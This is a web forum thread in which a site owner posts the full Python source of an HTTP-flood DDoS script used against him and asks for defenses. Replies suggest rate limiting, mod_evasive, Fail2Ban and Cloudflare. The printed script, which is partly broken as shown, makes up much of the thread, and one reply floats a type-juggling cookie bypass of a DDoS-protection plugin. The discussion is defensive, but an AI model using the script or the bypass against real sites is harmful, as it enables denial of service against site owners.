pwn3r

Member
Jan 1, 2018
143
63
64
I have been receiving a lot of attacks lately on my webserver and finally got referred to the script that this guys is using
I would like to know how can I protect my website against this type of script:

Python:
#/usr/bin/python

# function : ddos tools
# author   : firefoxbug

import os
import re
import sys
import time
import signal
import socket
import getopt
import random
import urllib
import threading

def usage():
    # print ''' usage : python attack.py [-t] [-c] http://www.zhihu.com/
    # -h : help
    # -t : lasting time of ddos
    # -c : numbers of thread to create'''

    sys.exit()

# generates a user agent array
def useragent_list():
    global headers_useragents
    headers_useragents = []
    headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
    headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
    headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
    headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
    headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
    return(headers_useragents)

# generates a referer array
def referer_list():
    global headers_referers
    headers_referers = []
    headers_referers.append('http://www.usatoday.com/search/results?q=')
    headers_referers.append('http://engadget.search.aol.com/search?q=')
    headers_referers.append('http://' + host + '/')
    return(headers_referers)

def handler(signum,_):
    # if signum == signal.SIGALRM:
        # print 'Time is up'
        # print 'Attack finished '
    sys.exit()

#builds random ascii string
def buildblock(size):
    out_str = ''
    for i in range(0, size):
        a = random.randint(65, 90)
        out_str += chr(a)
    return(out_str)

def send_packet(host,param_joiner):
    request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
    request.add_header('User-Agent', random.choice(headers_useragents))
    request.add_header('Cache-Control', 'no-cache')
    request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
    request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
    request.add_header('Keep-Alive', random.randint(110,120))
    request.add_header('Connection', 'keep-alive')
    request.add_header('Host',host)
    # try:
    #     response = urllib2.urlopen(request)
    # except urllib2.HTTPError, error:
    #     pass
    # except urllib2.URLError, error:
    #     pass
#    print "response code = %d "%response.code

def attack(host,param_joiner):
    while True:
        send_packet(host,param_joiner)

def parse_parameters(parameters):

    global url
    global interval
    global num_thread
    interval_def = 30
    num_thread_def = 5
    interval = interval_def
    num_thread = num_thread_def   
    try :
        opts,args = getopt.getopt(parameters,"ht:c:",["help"])
        url = args[0]
        for opt,arg in opts:
            if opt in ('-h','--help'):
                usage()
            elif opt in ('-t','--time'):
                if arg.isalnum():
                    interval = arg
                else:
                    usage()
            elif opt in ('-c','--count'):
                if arg.isalnum():
                    num_thread = arg
                else:
                    usage()
    except getopt.GetoptError: 
        print("getopt error!"); 
        usage(); 
        sys.exit(1);

if __name__ == '__main__':
    if len(sys.argv) < 2:
        usage()
        sys.exit()
    parse_parameters(sys.argv[1:])
    print ("Debug : thread=%d time=%d %s"%(int(num_thread),int(interval),url))
    if url.count('/') == 2:
        url = url + "/"
    m = re.search('http\://([^/]*)/?.*', url)
    try :
        host = m.group(1)
    except AttributeError as e:
        usage()
        sys.exit()

    useragent_list()
    referer_list()

    if url.count("?") > 0:
        param_joiner = "&"
    else:
        param_joiner = "?"
    
    signal.signal(signal.SIGINT, handler)
    signal.signal(signal.SIGALRM, handler)
    signal.alarm(int(interval))

    for i in range(int(num_thread)):
        newpid = os.fork()
        if newpid == 0:
#            signal.signal(signal.SIGINT, signal.SIG_DFL)
            attack(host,param_joiner)
        else:
            pass
#            print ("Child process",os.getpid(),newpid)
    time.sleep(int(interval))
    signal.alarm(0)
    print ("main thread exit...")


#     ddos
# ====

# DDOS tool in python.

# =============== usage =============

# python attack.py [option] http://www.firefoxbug.net/

#     -h : help

#     -t : lasting time of ddos

#     -c : numbers of thread to create


Source

I think Cloudflare could help but I do not want to keep attack mode enabled on my website
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
PLEASE ANSWER ME: What type of site are you running? WordPress, XenForo, or some other stuff.. I need to know for resource usage. Secondly, what server software - Apache, NGINX, etc

I think Cloudflare could help but I do not want to keep attack mode enabled on my website

Two main options: https://doc.bitninja.io/modules/dosdetection.html this is freaking cool.

Otherwise, on Apache use Mod_Security, Mod_Evasive, and maybe Fail2Ban

Nginx options include https://www.nginx.com/blog/rate-limiting-nginx/ or https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/

Hopefully the above options work, if not let me know and I will do additional testing. You could also attack this with another type of firewall like perhaps iptables but stopping this with a service like Cloudflare, Sucuri, or something else would be most ideal.

Some other neat shit to look into:

If your website is STATIC content, you could see about using something more efficient like https://zeit.co/

CLOUDKITE IS FKN COOL TOO MAN: https://github.com/coinkite/cloudfire

--- the rest is other stuff ---

I am going to investigate this behavior of attacking although based on how this works I believe we could use some sort of JavaScript on first load to allow the user in, otherwise block their loads - but perhaps rate limit them regardless. Do not let a single IP address use all your resources up quickly, so perhaps only allow X loads per minute.

What comes to mind is:

Mod_Evasive is quite a typical solution, although one could work this with NGINX:

 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
P.S. blocking at your defense level is sometimes the best, because whatever your network lets in.. you can get fkt.

Think of Cloudflare (and other similar network services) as a giant dam holding back water - read here https://github.com/matrix-org/matrix.org/issues/342#issuecomment-468958655

If someone drops the amount of dam-held water that Cloudflare can hold fine onto your little log of a server, imagine what will happen. I hope that makes sense. :)

tl;dr log gets washed away. Block what attacks you can with configurations, but if things just get too serious you may need a stronger network backbone.

For me to really see what is going on with the attack, we all need a traffic capture posted here.. somehow, or email me.

[email protected] - off.. to shower, gotta do doctor stuff lel
 

pwn3r

Member
Jan 1, 2018
143
63
64
For me to really see what is going on with the attack, we all need a traffic capture posted here.. somehow, or email me.
I searched my whole Log files and didn't seem to find those attacks - next time I'll try to save them before they get vanished.

Mod_Evasive is quite a typical solution, although one could work this with NGINX:
I'll try that first and then see the other alternatives you mentioned

Thanks @Asphyxia for your effort!
I will reply back to this post once I find a solution that works against this script
 

Asphyxia

Owner
Administrator
Apr 25, 2015
1,845
2
2,199
327
I will reply back to this post once I find a solution that works against this script
I can also do some testing to see how to remediate the issue, my best advice is to launch this attack on a test server and record in any measurable ways including but not limited to application logging, packet capturing, and ANY possible methods to obtain a signature of this attack.

Because essentially what is wanted: we want to find an attack signature to look for, then use that to detect attacks, and block the source. :)

For example, we could even tie in the Cloudflare API so immediately once the attack begins - we blacklist their IP inside Cloudflare! I will explore this attack more, soon. Also I REALLY NEED TO KNOW WHAT TYPE OF SITE ARE YOU RUNNING - A FORUM OR WORDPRESS CMS OR WHAT..
 

pwn3r

Member
Jan 1, 2018
143
63
64
Also I REALLY NEED TO KNOW WHAT TYPE OF SITE ARE YOU RUNNING - A FORUM OR WORDPRESS CMS OR WHAT..
When the attack was made, I had several sites on my vServer ( a vBulletin, a Flarum and some static pages ) they all went off once the attacker start his script.
Now, I still have the vBulletin forum, some static pages and running a PrestaShop website.
 

FarisDev

L oryh brx
Contributor
Jun 9, 2016
277
111
107
PLEASE ANSWER ME: What type of site are you running? WordPress, XenForo, or some other stuff.. I need to know for resource usage. Secondly, what server software - Apache, NGINX, etc



Two main options: https://doc.bitninja.io/modules/dosdetection.html this is freaking cool.

Otherwise, on Apache use Mod_Security, Mod_Evasive, and maybe Fail2Ban

Nginx options include https://www.nginx.com/blog/rate-limiting-nginx/ or https://www.nginx.com/blog/mitigating-ddos-attacks-with-nginx-and-nginx-plus/

Hopefully the above options work, if not let me know and I will do additional testing. You could also attack this with another type of firewall like perhaps iptables but stopping this with a service like Cloudflare, Sucuri, or something else would be most ideal.

Some other neat shit to look into:

If your website is STATIC content, you could see about using something more efficient like https://zeit.co/

CLOUDKITE IS FKN COOL TOO MAN: https://github.com/coinkite/cloudfire

--- the rest is other stuff ---

I am going to investigate this behavior of attacking although based on how this works I believe we could use some sort of JavaScript on first load to allow the user in, otherwise block their loads - but perhaps rate limit them regardless. Do not let a single IP address use all your resources up quickly, so perhaps only allow X loads per minute.

What comes to mind is:

Mod_Evasive is quite a typical solution, although one could work this with NGINX:

CleanTalk ddos protection might be vulnerable to type juggling I never tested it, but we can take a look at line 42
Code:
    if (isset($_COOKIE[$secure_cookie_label]) && $_COOKIE[$secure_cookie_label] == $secure_cookie_key) {
I think if we created the cookie, and added 0 as it's value or 1 or something else i never tried.
We will be able to bypass the protection
--
Correct me If I'm wrong. (Never tested) I just took a look.
 

dosh

Member
Nov 19, 2018
42
31
45
I think I can get you a trial of blazingfast reverse proxy or the webhost trial, if you're interested let me know
 
Top